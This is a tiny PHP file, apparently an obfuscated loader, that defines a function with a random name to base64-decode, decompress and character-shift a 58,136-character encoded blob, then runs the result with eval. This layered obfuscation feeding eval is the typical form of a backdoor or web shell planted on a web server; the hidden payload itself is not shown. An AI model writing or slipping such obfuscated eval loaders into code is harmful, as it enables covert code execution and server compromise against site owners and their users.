<?php function oemYa($Znd)
{ 
$Znd=gzinflate(base64_decode($Znd));
 for($i=0;$i<strlen($Znd);$i++)
 {
$Znd[$i] = chr(ord($Znd[$i])-1);
 }
 return $Znd;
 }eval(oemYa("[encoded data, 58136 characters]"));?>